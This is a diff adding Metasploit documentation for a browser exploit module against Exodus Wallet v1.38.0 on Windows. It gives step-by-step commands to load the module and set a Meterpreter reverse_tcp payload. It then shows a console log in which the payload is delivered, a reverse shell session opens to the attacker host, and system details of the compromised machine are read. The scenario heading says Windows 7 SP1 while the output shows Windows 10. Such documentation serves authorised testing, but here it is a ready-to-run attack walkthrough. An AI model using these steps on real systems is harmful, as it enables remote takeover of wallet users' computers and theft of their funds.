Exodus Documentation

documentation/modules/exploit/windows/browser/exodus.md

@@ -0,0 +1,45 @@
+
+## Verification Steps
+1. Install Exodus Wallet version `v1.38.0`
+2. Start `msfconsole`
+3. Do `use exploit/windows/browser/exodus`
+4. Do `set PAYLOAD windows/meterpreter/reverse_tcp`
+5. Do `set LHOST ip`
+6. Do `exploit`
+7. In the target machine browse to the malicious URL an launch Exodus
+8. Verify the Meterpreter session is opened
+
+## Scenarios
+
+# Exodus Wallet on Windows 7 SP1
+
+```
+msf > use exploit/windows/browser/exodus
+msf exploit(windows/browser/exodus) > set PAYLOAD windows/meterpreter/reverse_tcp
+PAYLOAD => windows/meterpreter/reverse_tcp
+msf exploit(windows/browser/exodus) > set LHOST 172.16.40.5 
+LHOST => 172.16.40.5
+msf exploit(windows/browser/exodus) > exploit 
+[*] Exploit running as background job 0.
+
+[*] Started reverse TCP handler on 172.16.40.5:4444 
+[*] Using URL: http://0.0.0.0:80/
+msf exploit(windows/browser/exodus) > [*] Local IP: http://172.16.40.5:80/
+[*] Server started.
+[*] 172.16.40.149    exodus - Delivering Payload
+[*] Sending stage (179779 bytes) to 172.16.40.149
+[*] Meterpreter session 1 opened (172.16.40.5:4444 -> 172.16.40.149:49726) at 2018-02-23 15:40:17 +0000
+
+msf exploit(windows/browser/exodus) > sessions 1
+[*] Starting interaction with 1...
+
+meterpreter > sysinfo 
+Computer        : DESKTOP-PI8214R
+OS              : Windows 10 (Build 10586).
+Architecture    : x64
+System Language : pt_PT
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x86/windows
+meterpreter > 
+```